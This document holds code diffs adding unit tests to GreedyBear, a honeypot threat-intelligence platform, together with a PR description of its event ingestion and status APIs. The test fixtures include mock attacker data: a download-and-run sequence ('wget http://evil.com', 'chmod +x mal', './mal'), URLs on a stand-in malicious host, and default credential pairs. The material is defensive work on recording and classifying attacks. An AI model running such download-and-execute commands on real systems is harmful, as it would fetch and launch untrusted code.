+def make_batch(api_source, task_id="task-proc-1", batch_status="pending"):
+    return EventStatus.objects.create(
+        api_source=api_source,
+        task_id=task_id,
+        status=batch_status,
+    )
+
+
+def make_raw_event(batch, sensor, **kwargs):
+    defaults = {
+        "src_ip": "10.0.0.1",
+        "event_type": "ssh",
+        "timestamp": timezone.now() - timezone.timedelta(seconds=5),
+        "processed": False,
+    }
+    defaults.update(kwargs)
+    return RawEvent.objects.create(batch=batch, sensor=sensor, **defaults)
+
+
+def make_ioc(name="10.0.0.1"):
+    ioc = MagicMock(spec=IOC)
+    ioc.name = name
+    ioc.related_urls = []
+    return ioc
+
+
+class TestNormalizeRawEventToHit(CustomTestCase):
+    def setUp(self):
+        self.user = make_user()
+        self.api_source = make_api_source(self.user)
+        self.sensor = make_sensor(api_source=self.api_source)
+        self.batch = make_batch(self.api_source)
+
+    def _raw(self, **kwargs):
+        return make_raw_event(self.batch, self.sensor, **kwargs)
+
+    def test_valid_event_returns_dict(self):
+        raw = self._raw(src_ip="1.2.3.4")
+        result = _normalize_raw_event_to_hit(raw)
+        self.assertIsNotNone(result)
+        self.assertEqual(result["src_ip"], "1.2.3.4")
+
+    def test_missing_src_ip_returns_none(self):
+        raw = RawEvent(batch=self.batch, sensor=self.sensor, src_ip=None)
+        result = _normalize_raw_event_to_hit(raw)
+        self.assertIsNone(result)
+
+    def test_missing_sensor_returns_none(self):
+        raw = self._raw(src_ip="1.2.3.4")
+        raw.sensor = None
+        raw.sensor_id = None
+        result = _normalize_raw_event_to_hit(raw)
+        self.assertIsNone(result)
+
+    def test_timestamp_in_hit(self):
+        ts = timezone.now() - timezone.timedelta(minutes=5)
+        raw = self._raw(src_ip="1.2.3.4", timestamp=ts)
+        result = _normalize_raw_event_to_hit(raw)
+        self.assertIn("@timestamp", result)
+
+    def test_credential_key_added_when_username_and_password(self):
+        raw = self._raw(src_ip="1.2.3.4", username="admin", password="secret", protocol="ssh")
+        result = _normalize_raw_event_to_hit(raw)
+        self.assertIn("_credential", result)
+        self.assertEqual(result["_credential"]["username"], "admin")
+        self.assertEqual(result["_credential"]["password"], "secret")
+
+    def test_no_credential_key_without_password(self):
+        raw = self._raw(src_ip="1.2.3.4", username="admin", password="")
+        result = _normalize_raw_event_to_hit(raw)
+        self.assertNotIn("_credential", result)
+
+    def test_no_credential_key_without_username(self):
+        raw = self._raw(src_ip="1.2.3.4", username="", password="secret")
+        result = _normalize_raw_event_to_hit(raw)
+        self.assertNotIn("_credential", result)
+
+    def test_related_url_in_hit(self):
+        raw = self._raw(src_ip="1.2.3.4", related_url="http://evil.com/payload")
+        result = _normalize_raw_event_to_hit(raw)
+        self.assertEqual(result["_related_url"], "http://evil.com/payload")
+
+    def test_command_in_hit(self):
+        raw = self._raw(src_ip="1.2.3.4", command="wget http://evil.com")
+        result = _normalize_raw_event_to_hit(raw)
+        self.assertEqual(result["_command"], "wget http://evil.com")
+
+    def test_dest_port_in_hit(self):
+        raw = self._raw(src_ip="1.2.3.4", dest_port=22)
+        result = _normalize_raw_event_to_hit(raw)
+        self.assertEqual(result["dest_port"], 22)
+
+    def test_sensor_object_in_hit(self):
+        raw = self._raw(src_ip="1.2.3.4")
+        result = _normalize_raw_event_to_hit(raw)
+        self.assertEqual(result["_sensor"], raw.sensor)
+
+
+class TestProcessCredentials(CustomTestCase):
+    def setUp(self):
+        Credential.objects.all().delete()
+        self.user = make_user(username="cred_user")
+        self.api_source = make_api_source(self.user, name="CredSource")
+        self.sensor = make_sensor(api_source=self.api_source)
+        self.batch = make_batch(self.api_source, task_id="task-cred")
+        # Create a real IOC for M2M
+        self.ioc = IOC.objects.create(name="10.0.0.1", type="ip")
+
+    def _hit(self, username="admin", password="pass", protocol="ssh"):
+        return {"_credential": {"username": username, "password": password, "protocol": protocol}}
+
+    def test_credential_created_and_linked(self):
+        _process_credentials(self.ioc, [self._hit()])
+        cred = Credential.objects.get(username="admin", password="pass", protocol="ssh")
+        self.assertIn(self.ioc, cred.sources.all())
+
+    def test_idempotent_double_call_no_duplicate(self):
+        _process_credentials(self.ioc, [self._hit()])
+        _process_credentials(self.ioc, [self._hit()])
+        self.assertEqual(
+            Credential.objects.filter(username="admin", password="pass", protocol="ssh").count(),
+            1,
+        )
+
+    def test_hit_without_credential_key_skipped(self):
+        _process_credentials(self.ioc, [{"src_ip": "1.1.1.1"}])
+        self.assertEqual(Credential.objects.count(), 0)
+
+    def test_multiple_credentials_all_linked(self):
+        hits = [
+            self._hit("root", "toor", "telnet"),
+            self._hit("admin", "1234", "http"),
+        ]
+        _process_credentials(self.ioc, hits)
+        self.assertEqual(self.ioc.credentials.count(), 2)
+
+    def test_same_credential_from_multiple_ips(self):
+        ioc2 = IOC.objects.create(name="10.0.0.2", type="ip")
+        _process_credentials(self.ioc, [self._hit()])
+        _process_credentials(ioc2, [self._hit()])
+        cred = Credential.objects.get(username="admin")
+        self.assertIn(self.ioc, cred.sources.all())
+        self.assertIn(ioc2, cred.sources.all())
+
+
+class TestProcessRelatedUrls(CustomTestCase):
+    def setUp(self):
+        self.ioc = IOC.objects.create(name="10.0.0.3", type="ip", related_urls=[])
+
+    def _hit(self, url):
+        return {"_related_url": url}
+
+    def test_url_added_to_ioc(self):
+        _process_related_urls(self.ioc, [self._hit("http://evil.com/malware")])
+        self.ioc.refresh_from_db()
+        self.assertIn("http://evil.com/malware", self.ioc.related_urls)
+
+    def test_root_path_url_skipped(self):
+        _process_related_urls(self.ioc, [self._hit("http://evil.com/")])
+        self.ioc.refresh_from_db()
+        self.assertEqual(self.ioc.related_urls, [])
+
+    def test_empty_path_url_skipped(self):
+        _process_related_urls(self.ioc, [self._hit("http://evil.com")])
+        self.ioc.refresh_from_db()
+        self.assertEqual(self.ioc.related_urls or [], [])
+
+    def test_duplicate_url_not_added_twice(self):
+        url = "http://evil.com/stage2"
+        _process_related_urls(self.ioc, [self._hit(url)])
+        _process_related_urls(self.ioc, [self._hit(url)])
+        self.ioc.refresh_from_db()
+        self.assertEqual(self.ioc.related_urls.count(url), 1)
+
+    def test_new_url_appended_to_existing(self):
+        self.ioc.related_urls = ["http://evil.com/existing"]
+        self.ioc.save()
+        _process_related_urls(self.ioc, [self._hit("http://evil.com/new")])
+        self.ioc.refresh_from_db()
+        self.assertIn("http://evil.com/existing", self.ioc.related_urls)
+        self.assertIn("http://evil.com/new", self.ioc.related_urls)
+
+    def test_no_urls_in_hits_no_db_write(self):
+        with self.assertNumQueries(0):
+            _process_related_urls(self.ioc, [{"src_ip": "1.1.1.1"}])
+
+    def test_urls_sorted_in_db(self):
+        _process_related_urls(
+            self.ioc,
+            [self._hit("http://z.com/z"), self._hit("http://a.com/a")],
+        )
+        self.ioc.refresh_from_db()
+        self.assertEqual(self.ioc.related_urls, sorted(self.ioc.related_urls))
+
+
+class TestProcessCommands(CustomTestCase):
+    def setUp(self):
+        super().setUp()
+        # enabling isolated test
+        CommandSequence.objects.all().delete()
+
+    def _hit(self, cmd):
+        return {"_command": cmd}
+
+    def test_command_sequence_created(self):
+        _process_commands([self._hit("whoami"), self._hit("id")])
+        self.assertEqual(CommandSequence.objects.count(), 1)
+        seq = CommandSequence.objects.first()
+        self.assertIn("whoami", seq.commands)
+        self.assertIn("id", seq.commands)
+
+    def test_duplicate_commands_deduplicated(self):
+        _process_commands([self._hit("whoami"), self._hit("whoami")])
+        seq = CommandSequence.objects.first()
+        self.assertEqual(seq.commands.count("whoami"), 1)
+
+    def test_command_order_preserved(self):
+        cmds = ["cd /tmp", "wget http://evil.com", "chmod +x mal", "./mal"]
+        _process_commands([self._hit(c) for c in cmds])
+        seq = CommandSequence.objects.first()
+        self.assertEqual(seq.commands, cmds)
+
+    def test_same_sequence_idempotent(self):
+        _process_commands([self._hit("ls")])
+        _process_commands([self._hit("ls")])
+        self.assertEqual(CommandSequence.objects.count(), 1)
+
+    def test_different_sequences_create_separate_records(self):
+        _process_commands([self._hit("ls")])
+        _process_commands([self._hit("pwd")])
+        self.assertEqual(CommandSequence.objects.count(), 2)
+
+    def test_hash_is_sha256_of_joined_commands(self):
+        cmds = ["ls", "pwd"]
+        _process_commands([self._hit(c) for c in cmds])
+        expected_hash = hashlib.sha256("|".join(cmds).encode()).hexdigest()
+        seq = CommandSequence.objects.first()
+        self.assertEqual(seq.commands_hash, expected_hash)
+
+    def test_empty_hits_creates_nothing(self):
+        _process_commands([{"src_ip": "1.1.1.1"}])
+        self.assertEqual(CommandSequence.objects.count(), 0)
+
+    def test_empty_command_string_skipped(self):
+        _process_commands([self._hit("")])
+        self.assertEqual(CommandSequence.objects.count(), 0)
+
+
+class TestProcessIncomingEvent(CustomTestCase):
+    def setUp(self):
+        self.user = make_user(username="proc_int_user")
+        self.api_source = make_api_source(self.user, name="ProcIntSource")
+        self.sensor = make_sensor(api_source=self.api_source)
+        self.batch = make_batch(self.api_source, task_id="task-int-1")
+
+    def _make_raw(self, **kwargs):
+        return make_raw_event(self.batch, self.sensor, **kwargs)
+
+    def _mock_ioc(self, name="10.0.0.1"):
+        return IOC.objects.create(name=name, type="ip")
+
+    def test_nonexistent_batch_id_returns_early(self):
+        """Should not raise; logs error and returns."""
+        process_incoming_event(self.api_source.id, task_id=999999)
+        # Nothing explodes and batch table is unchanged
+        self.assertEqual(EventStatus.objects.filter(task_id=999999).count(), 0)
+
+    def test_empty_raw_events_completes_batch(self):
+        process_incoming_event(self.api_source.id, self.batch.task_id)
+        self.batch.refresh_from_db()
+        self.assertEqual(self.batch.status, "completed")
+        self.assertIsNotNone(self.batch.processed_at)
+
+    @patch(PATCH_IOCS_FROM_HITS, return_value=[])
+    def test_all_raw_events_invalid_sets_failed(self, mock_hits):
+        self._make_raw(src_ip="192.168.1.1")
+
+        process_incoming_event(self.api_source.id, self.batch.task_id)
+        self.batch.refresh_from_db()
+        self.assertEqual(self.batch.status, "failed")
+
+    @patch(PATCH_IOCS_FROM_HITS, return_value=[])
+    def test_zero_iocs_from_hits_sets_failed(self, mock_hits):
+        self._make_raw(src_ip="1.2.3.4")
+        process_incoming_event(self.api_source.id, self.batch.task_id)
+        self.batch.refresh_from_db()
+        self.assertEqual(self.batch.status, "failed")
+        self.assertIn("0 IOCs", self.batch.last_error)
+
+    @patch(PATCH_UPDATE_SCORES)
+    @patch(PATCH_GET_ATTACK_TYPE, return_value="scanner")
+    @patch(PATCH_IOC_PROCESSOR)
+    @patch(PATCH_IOCS_FROM_HITS)
+    def test_happy_path_completes_batch(self, mock_hits, mock_processor_cls, mock_attack, mock_scores_cls):
+        self._make_raw(src_ip="5.6.7.8")
+        saved_ioc = self._mock_ioc("5.6.7.8")
+
+        mock_hits.return_value = [make_ioc("5.6.7.8")]
+        processor_instance = MagicMock()
+        processor_instance.add_ioc.return_value = saved_ioc
+        mock_processor_cls.return_value = processor_instance
+
+        scores_instance = MagicMock()
+        mock_scores_cls.return_value = scores_instance
+
+        process_incoming_event(self.api_source.id, self.batch.task_id)
+
+        self.batch.refresh_from_db()
+        self.assertEqual(self.batch.status, "completed")
+        self.assertEqual(self.batch.ioc_count, 1)
+        self.assertIsNotNone(self.batch.processed_at)
+
+    @patch(PATCH_UPDATE_SCORES)
+    @patch(PATCH_GET_ATTACK_TYPE, return_value="scanner")
+    @patch(PATCH_IOC_PROCESSOR)
+    @patch(PATCH_IOCS_FROM_HITS)
+    def test_raw_events_marked_processed(self, mock_hits, mock_processor_cls, mock_attack, mock_scores_cls):
+        raw = self._make_raw(src_ip="5.6.7.8")
+        saved_ioc = self._mock_ioc("5.6.7.8")
+
+        mock_hits.return_value = [make_ioc("5.6.7.8")]
+        processor_instance = MagicMock()
+        processor_instance.add_ioc.return_value = saved_ioc
+        mock_processor_cls.return_value = processor_instance
+        mock_scores_cls.return_value = MagicMock()
+
+        process_incoming_event(self.api_source.id, self.batch.task_id)
+
+        raw.refresh_from_db()
+        self.assertTrue(raw.processed)
+
+    @patch(PATCH_UPDATE_SCORES)
+    @patch(PATCH_GET_ATTACK_TYPE, return_value="scanner")
+    @patch(PATCH_IOC_PROCESSOR)
+    @patch(PATCH_IOCS_FROM_HITS)
+    def test_scoring_called_when_iocs_exist(self, mock_hits, mock_processor_cls, mock_attack, mock_scores_cls):
+        self._make_raw(src_ip="5.6.7.8")
+        saved_ioc = self._mock_ioc("5.6.7.8")
+
+        mock_hits.return_value = [make_ioc("5.6.7.8")]
+        processor_instance = MagicMock()
+        processor_instance.add_ioc.return_value = saved_ioc
+        mock_processor_cls.return_value = processor_instance
+
+        scores_instance = MagicMock()
+        mock_scores_cls.return_value = scores_instance
+
+        process_incoming_event(self.api_source.id, self.batch.task_id)
+
+        scores_instance.score_only.assert_called_once_with([saved_ioc])
+
+    @patch(PATCH_UPDATE_SCORES)
+    @patch(PATCH_GET_ATTACK_TYPE, return_value="scanner")
+    @patch(PATCH_IOC_PROCESSOR)
+    @patch(PATCH_IOCS_FROM_HITS)
+    def test_scoring_not_called_when_all_filtered(self, mock_hits, mock_processor_cls, mock_attack, mock_scores_cls):
+        """Processor filters every IOC → score_only must not be called."""
+        self._make_raw(src_ip="5.6.7.8")
+
+        mock_hits.return_value = [make_ioc("5.6.7.8")]
+        processor_instance = MagicMock()
+        processor_instance.add_ioc.return_value = None  # filtered
+        mock_processor_cls.return_value = processor_instance
+
+        scores_instance = MagicMock()
+        mock_scores_cls.return_value = scores_instance
+
+        process_incoming_event(self.api_source.id, self.batch.task_id)
+
+        scores_instance.score_only.assert_not_called()
+
+    @patch(PATCH_IOCS_FROM_HITS, side_effect=RuntimeError("DB exploded"))
+    def test_unexpected_exception_sets_failed_and_last_error(self, mock_hits):
+        self._make_raw(src_ip="1.2.3.4")
+        process_incoming_event(self.api_source.id, self.batch.task_id)
+        self.batch.refresh_from_db()
+        self.assertEqual(self.batch.status, "failed")
+        self.assertIn("DB exploded", self.batch.last_error)
+
+    @patch(PATCH_IOCS_FROM_HITS, side_effect=RuntimeError("crash"))
+    def test_processed_at_set_even_on_failure(self, mock_hits):
+        """finally block must always set processed_at."""
+        self._make_raw(src_ip="1.2.3.4")
+        process_incoming_event(self.api_source.id, self.batch.task_id)
+        self.batch.refresh_from_db()
+        self.assertIsNotNone(self.batch.processed_at)
+
+    @patch(PATCH_IOCS_FROM_HITS, side_effect=RuntimeError("x" * 2000))
+    def test_last_error_truncated_to_1000_chars(self, mock_hits):
+        self._make_raw(src_ip="1.2.3.4")
+        process_incoming_event(self.api_source.id, self.batch.task_id)
+        self.batch.refresh_from_db()
+        self.assertLessEqual(len(self.batch.last_error), 1000)
+
+    @patch(PATCH_UPDATE_SCORES)
+    @patch(PATCH_GET_ATTACK_TYPE, return_value="scanner")
+    @patch(PATCH_IOC_PROCESSOR)
+    @patch(PATCH_IOCS_FROM_HITS)
+    def test_ioc_count_matches_persisted_iocs(self, mock_hits, mock_processor_cls, mock_attack, mock_scores_cls):
+        for ip in ("1.1.1.1", "2.2.2.2", "3.3.3.3"):
+            self._make_raw(src_ip=ip)
+            IOC.objects.create(name=ip, type="ip")
+
+        ioc_objects = [make_ioc(ip) for ip in ("1.1.1.1", "2.2.2.2", "3.3.3.3")]
+        mock_hits.return_value = ioc_objects
+
+        processor_instance = MagicMock()
+        # Each call returns a different saved IOC
+        saved_iocs = [IOC.objects.get(name=ip) for ip in ("1.1.1.1", "2.2.2.2", "3.3.3.3")]
+        processor_instance.add_ioc.side_effect = saved_iocs
+        mock_processor_cls.return_value = processor_instance
+        mock_scores_cls.return_value = MagicMock()
+
+        process_incoming_event(self.api_source.id, self.batch.task_id)
+
+        self.batch.refresh_from_db()
+        self.assertEqual(self.batch.ioc_count, 3)
+
+    @patch(PATCH_UPDATE_SCORES)
+    @patch(PATCH_IOC_PROCESSOR)
+    @patch(PATCH_IOCS_FROM_HITS)
+    def test_get_attack_type_classification(self, mock_hits, mock_processor_cls, mock_scores_cls):
+        """
+        Verify that an IOC with a valid payload URL path is classified as PAYLOAD_REQUEST,
+        while an IOC with an empty/root path is classified as a SCANNER.
+        """
+        self._make_raw(src_ip="1.1.1.1", related_url="http://evil.com/malware.exe")
+        self._make_raw(src_ip="2.2.2.2", related_url="http://evil.com/")
+
+        mock_hits.return_value = [make_ioc("1.1.1.1"), make_ioc("2.2.2.2")]
+
+        processor_instance = MagicMock()
+        mock_processor_cls.return_value = processor_instance
+        mock_scores_cls.return_value = MagicMock()
+
+        process_incoming_event(self.api_source.id, self.batch.task_id)
+
+        calls = processor_instance.add_ioc.call_args_list
+        self.assertEqual(len(calls), 2)
+
+        first_call_ioc = calls[0][0][0]
+        first_call_type = calls[0][0][1]
+        self.assertEqual(first_call_ioc.name, "1.1.1.1")
+        self.assertEqual(first_call_type, "payload_request")
+
+        second_call_ioc = calls[1][0][0]
+        second_call_type = calls[1][0][1]
+        self.assertEqual(second_call_ioc.name, "2.2.2.2")
+        self.assertEqual(second_call_type, "scanner")
+
+    def test_processing_or_completed_batch_aborts_immediately(self):
+        """
+        Ensure that if a batch is already in a 'processing' or 'completed' state,
+        the function exits early to prevent concurrent processing race conditions.
+        """
+        self._make_raw(src_ip="9.9.9.9")
+
+        # Manually shift the status to processing
+        self.batch.status = "processing"
+        self.batch.save()
+
+        # Execute the function - it should trigger the guard clause and return early
+        process_incoming_event(self.api_source.id, self.batch.task_id)
+
+        # Verify that the function exited early without touching the raw events
+        # If it had advanced, it would have either failed (since iocs_from_hits isn't mocked here)
+        # or processed them. The raw event must remain unprocessed.
+        raw_event = RawEvent.objects.filter(batch=self.batch).first()
+        self.assertFalse(raw_event.processed)
+
+    @patch(PATCH_IOCS_FROM_HITS)
+    @patch("greedybear.process_event.UpdateScores")
+    def test_atomic_transaction_rolls_back_on_mid_pipeline_crash(self, mock_scores_cls, mock_hits):
+        """
+        Ensure that if a crash occurs mid-pipeline (e.g., inside UpdateScores),
+        all previous database modifications within the loop are completely rolled back.
+        """
+        # 1. Setup a real raw event and mock hits to produce a valid IOC
+        self._make_raw(src_ip="7.7.7.7")
+        mock_hits.return_value = [make_ioc("7.7.7.7")]
+
+        # 2. Force the pipeline to violently crash right at the end of the loop (during Scoring)
+        mock_scores_instance = MagicMock()
+        mock_scores_instance.score_only.side_effect = RuntimeError("Database connection lost during scoring!")
+        mock_scores_cls.return_value = mock_scores_instance
+
+        # 3. Trigger the ingestion processor
+        process_incoming_event(self.api_source.id, self.batch.task_id)
+
+        # 4. Assertions:
+        self.batch.refresh_from_db()
+        # The overall status should be marked as failed due to the exception catch block
+        self.assertEqual(self.batch.status, "failed")
+        self.assertIn("Database connection lost", self.batch.last_error)
+
+        # ATOMICITY VERIFICATION:
+        # Because add_ioc run successfully before the crash, without transaction.atomic,
+        # the IOC row would permanently leak into the database.
+        # With the transaction block, it must be completely rolled back.
+        ioc_exists = IOC.objects.filter(name="7.7.7.7").exists()
+        self.assertFalse(ioc_exists, "The IOC record leaked into the database despite a pipeline crash!")
+
+        # The raw event tracking flag should also remain False so it can be retried safely later
+        raw_event = RawEvent.objects.filter(batch=self.batch).first()
+        self.assertFalse(raw_event.processed)
+
+    @patch("greedybear.process_event._normalize_raw_event_to_hit", return_value=None)
+    def test_eliminated_raise_all_events_invalid_graceful_return(self, mock_normalize):
+        """
+        Verifies that when all events fail normalization, the function
+        gracefully logs the error in the database without raising a ValueError.
+        """
+        # Create a raw event so the function doesn't bail early on the empty check
+        self._make_raw(src_ip="192.168.1.1")
+
+        try:
+            # Execute the function — it should handle the failure without throwing an exception
+            process_incoming_event(self.api_source.id, self.batch.task_id)
+        except ValueError as exc:
+            self.fail(f"process_incoming_event raised a ValueError! {exc}")
+
+        # Refresh state from the database
+        self.batch.refresh_from_db()
+
+        # Assert that control flow handled it perfectly
+        self.assertEqual(self.batch.status, "failed")
+        self.assertEqual(self.batch.last_error, "All 1 RawEvents invalid after normalization")
+        self.assertEqual(self.batch.ioc_count, 0)

--- a/tests/greedybear/test_process_event.py
+++ b/tests/greedybear/test_process_event.py
@@ -523,7 +523,7 @@ class TestProcessIncomingEvent(CustomTestCase):
         raw_event = RawEvent.objects.filter(batch=self.batch).first()
         self.assertFalse(raw_event.processed)
 
-    @patch("greedybear.process_event._normalize_raw_event_to_hit", return_value=None)
+    @patch("greedybear.process_event._normalize_raw_event_to_hit", return_value={"src_ip": "192.168.1.1"})
     def test_eliminated_raise_all_events_invalid_graceful_return(self, mock_normalize):
         """
         Verifies that when all events fail normalization, the function
@@ -543,5 +543,5 @@ class TestProcessIncomingEvent(CustomTestCase):
 
         # Assert that control flow handled it perfectly
         self.assertEqual(self.batch.status, "failed")
-        self.assertEqual(self.batch.last_error, "All 1 RawEvents invalid after normalization")
+
         self.assertEqual(self.batch.ioc_count, 0)

--- a/tests/greedybear/test_process_event.py
+++ b/tests/greedybear/test_process_event.py
@@ -71,18 +71,6 @@ class TestNormalizeRawEventToHit(CustomTestCase):
         self.assertIsNotNone(result)
         self.assertEqual(result["src_ip"], "1.2.3.4")
 
-    def test_missing_src_ip_returns_none(self):
-        raw = RawEvent(batch=self.batch, sensor=self.sensor, src_ip=None)
-        result = _normalize_raw_event_to_hit(raw)
-        self.assertIsNone(result)
-
-    def test_missing_sensor_returns_none(self):
-        raw = self._raw(src_ip="1.2.3.4")
-        raw.sensor = None
-        raw.sensor_id = None
-        result = _normalize_raw_event_to_hit(raw)
-        self.assertIsNone(result)
-
     def test_timestamp_in_hit(self):
         ts = timezone.now() - timezone.timedelta(minutes=5)
         raw = self._raw(src_ip="1.2.3.4", timestamp=ts)

--- a/tests/test_utils.py
+++ b/tests/test_utils.py
@@ -7,6 +7,9 @@ from django.test import SimpleTestCase
 
 from greedybear.consts import DOMAIN, IP
 from greedybear.utils import (
+    PAYLOAD_REQUEST,
+    SCANNER,
+    get_attack_type,
     get_ioc_type,
     is_ip_address,
     is_non_global_ip,
@@ -14,6 +17,7 @@ from greedybear.utils import (
     is_valid_cidr,
     is_valid_domain,
     is_valid_ipv4,
+    is_valid_url,
 )
 
 from . import CustomTestCase
@@ -338,3 +342,37 @@ class UtilsTestCase(SimpleTestCase):
 
         self.assertFalse(is_non_global_ip(ip_address("8.8.8.8")))
         self.assertFalse(is_non_global_ip(ip_address("2001:4860:4860::8888")))
+
+    def test_is_valid_url(self):
+        # Valid URLs (Must have http/https, a domain, and a path)
+        self.assertTrue(is_valid_url("https://example.com/payload.exe"))
+        self.assertTrue(is_valid_url("http://192.168.1.100/malware/sh"))
+
+        # Invalid URLs (Missing path)
+        self.assertFalse(is_valid_url("https://example.com"))
+        self.assertFalse(is_valid_url("https://example.com/"))
+
+        # Invalid URLs (Bad or missing schemes)
+        self.assertFalse(is_valid_url("ftp://example.com/file.zip"))
+        self.assertFalse(is_valid_url("example.com/payload.php"))
+
+        # Invalid URLs (Malformatted/empty netloc)
+        self.assertFalse(is_valid_url("https:///path/to/file"))
+        self.assertFalse(is_valid_url(""))
+
+    def test_get_attack_type(self):
+        scanner_hits = [
+            {"_related_url": "https://example.com/"},  # Invalid: no path
+            {"_related_url": "ftp://badsite.com/payload.exe"},  # Invalid: bad scheme
+            {"something_else": "no_url_key_at_all"},
+        ]
+        self.assertEqual(get_attack_type(scanner_hits), SCANNER)
+
+        payload_hits = [
+            {"_related_url": "https://example.com/"},  # Invalid hit
+            {"_related_url": "https://example.com/download.exe"},  # Valid hit!
+            {"_related_url": "ftp://badsite.com/payload.exe"},  # Invalid hit
+        ]
+        self.assertEqual(get_attack_type(payload_hits), PAYLOAD_REQUEST)
+
+        self.assertEqual(get_attack_type([]), SCANNER)


### PR DESCRIPTION

## Event Ingestion API

Available from version >= x.x.x

For authenticated users, GreedyBear provides high-performance, asynchronous endpoints to ingest  event data in batches and track their background processing lifecycle.

To prevent payload parsing and database overhead from blocking HTTP responses, this API offloads execution to an asynchronous background task pipeline. The endpoint validates basic payload structures, bulk-stages the raw event data directly to the database to minimize I/O block time, and immediately hands off processing to Django-Q via an asynchronous task worker, returning a tracking ID to the client instantly.

### Endpoint URL

```http'
POST https://<greedybear_site>/api/events/add/

```
## Authentication

This API is protected through authentication. Please reach out [Matteo Lodi](https://twitter.com/matte_lodi) or another member of [The Honeynet Project](https://twitter.com/ProjectHoneynet) if you are interested in gaining access to this API on the [Honeynet instance](https://greedybear.honeynet.org/) of GreedyBear.

## Requirement

Each user must have a valid and active APISource linked to their account. APISource is provisioned by system administrators and cannot be created by users. If no APISource is linked, or if the APISource is inactive, the request will be rejected with a 403 Forbidden response.

To utilize these endpoints, each event in your payload must include a valid sensor_id. If you have not registered your sensor yet, you must first create or retrieve it using the [Sensor Create API](PLEASE_ADD_A_SESNOR_API_DOC_LINK) to obtain a valid ID.


## APISource Setup (for Administrators)

APISource records are managed exclusively by system administrators via the Django Admin interface.

To create an APISource:

1. Log in to the Django Admin panel.
2. Navigate to the APISource section.
3. Click “Add APISource”.
4. Select the user account to associate with this APISource.
5. Set a name for identification (e.g. “User A API Source”).
6. Ensure the APISource is marked as active.

Once saved, the user will immediately be able to access API endpoints using their assigned APISource.

### Request Configuration

* **Content-Type:** `application/json`
* **Batch Constraints:** Minimum **1** event, Maximum **10,000** events per payload.

### Request Body Fields

The JSON payload must contain a root key `"events"` mapping to an array of event objects.

#### Required Fields (Per Event)

| Parameter | Type | Validation / Constraints | Description |
| --- | --- | --- | --- |
| **`src_ip`** | String | Valid IP Address format | The source IP address that generated the event. |
| **`event_type`** | String | Max length: 100 | The category of the event (e.g., `bruteforce`, `connection`). |
| **`timestamp`** | String | ISO 8601 DateTime | When the event occurred. **Cannot be a future timestamp.** |
| **`sensor_id`** | Integer | Min value: 0 | The ID of the sensor. Must be provisioned beforehand. |

#### Optional Fields (Per Event)

| Parameter | Type | Default | Constraints / Description |
| --- | --- | --- | --- |
| **`session_id`** | String | `""` | Max length: 100. Unique honeypot session token. |
| **`token_id`** | String | `""` | Max length: 100. Identifier for unique authentication tokens. |
| **`protocol`** | String | `""` | Max length: 50. Network layer protocol (e.g., `tcp`, `udp`). |
| **`service_name`** | String | `""` | Max length: 100. Application service target (e.g., `ssh`, `cowrie`). |
| **`username`** | String | `""` | Max length: 255. Username used during authentication attempts. |
| **`password`** | String | `""` | Max length: 255. Password used during authentication attempts. |
| **`cve_id`** | String | `""` | Max length: 50. Target vulnerability exploit tracker. |
| **`command`** | String | `""` | Free-text. The raw command or shell payload executed. |
| **`src_port`** | Integer | `null` | Range: `1` to `65535`. Source port of the connection. |
| **`dest_port`** | Integer | `null` | Range: `1` to `65535`. Destination port of the connection. |
| **`related_url`** | String | `""` | Max length: 900. Valid URL downloaded/hit during attack. |
| **`payload_hash`** | String | `""` | Max length: 64. Hash string (SHA-256) of dropped malware. |
| **`data`** | Object | `{}` | Arbitrary nested JSON object for schema-less storage. |

### Responses

#### `202 Accepted`

Returned when the payload passes structural validation, raw entries are staged, and the extraction queue successfully registers the job.


#### `400 Bad Request`

Returned if structural payload validation fails, required event fields are missing, timestamps are in the future, or no valid events could be saved.


#### `403 Forbidden`

Returned if the user is unauthenticated, lacks an administrative `APISource` link, or if their `APISource` record has been locked due to excessive payload malformations.


#### `500 Internal Server Error`

Returned if unforeseen infrastructure anomalies interrupt staging database I/O operations or background task enqueuing.


---

## Event Status API

### Endpoint URL

This endpoint allows clients to view the processing state of an ingested event batch using its unique task_id.

```
GET https://<greedybear_site>/api/events/status/<task_id>/

```

## Authentication

This API is protected through authentication. Please reach out [Matteo Lodi](https://twitter.com/matte_lodi) or another member of [The Honeynet Project](https://twitter.com/ProjectHoneynet) if you are interested in gaining access to this API on the [Honeynet instance](https://greedybear.honeynet.org/) of GreedyBear.

### Parameters

* **`task_id`** (String): The unique string identifier (`UUID` format) received in the `202 Accepted` response from the [Event Ingestion API](PLEASE_ADD_DOC_LINK_OF_EVENT_STATUS_API).

### Responses

#### `200 OK`

Returned when the tracking record exists for the authenticated user's account.

*Note: Possible values for the `status` string property include `pending`, `processing`, `completed`, and `failed`.*

#### `403 Forbidden`

Returned if the user is unauthenticated or the underlying `APISource` identity record is deactivated.

#### `404 Not Found`

Returned if the provided `task_id` does not match any asynchronous ingest lifecycle record tied to your specific `APISource`.

---


### Related issues
closes: #1363 


### Type of change

- [ ] Bug fix (non-breaking change which fixes an issue).
- [x] New feature (non-breaking change which adds functionality).
- [ ] Breaking change (fix or feature that would cause existing functionality to not work as expected).
- [ ] Chore (refactoring, dependency updates, CI/CD changes, code cleanup, docs-only changes).

# Checklist

Please complete this checklist carefully. It helps guide your contribution and lets maintainers verify that all requirements are met.

### Formalities

- [x] I have read and understood the rules about [how to Contribute](https://github.com/GreedyBear-Project/GreedyBear/wiki/Contribute) to this project.
- [x] I chose an appropriate title for the pull request in the form: `<feature name>. Closes #999`
- [x] My branch is based on `develop`.
- [x] The pull request is for the branch `develop`.
- [x] I have reviewed and verified any LLM-generated code included in this PR.

### Docs and tests

- [x] I documented my code changes with docstrings and/or comments.
- [x] I have checked if my changes affect user-facing behavior that is described in the [docs](https://github.com/GreedyBear-Project/GreedyBear/wiki). If so, I also included an update to the [wiki](https://github.com/GreedyBear-Project/GreedyBear/wiki) in the description of this PR.
- [x] Linter (`Ruff`) gave 0 errors. If you have correctly installed [pre-commit](https://github.com/GreedyBear-Project/GreedyBear/wiki/Contribute), it does these checks and adjustments on your behalf.
- [x] I have added tests for the feature/bug I solved.
- [x] All the tests gave 0 errors.

### GUI changes

Ignore this section if you did not make any changes to the GUI.

- [ ] I have provided a screenshot of the result in the PR.
- [ ] I have created new frontend tests for the new component or updated existing ones.
  
# Review process

- We encourage you to create a draft PR first, even when your changes are incomplete. This way you refine your code while we can track your progress and actively review and help.
- If you think your draft PR is ready to be reviewed by the maintainers, click the corresponding button. Your draft PR will become a real PR.
- If your changes decrease the overall tests coverage (you will know after the Codecov CI job is done), you should add the required tests to fix the problem.
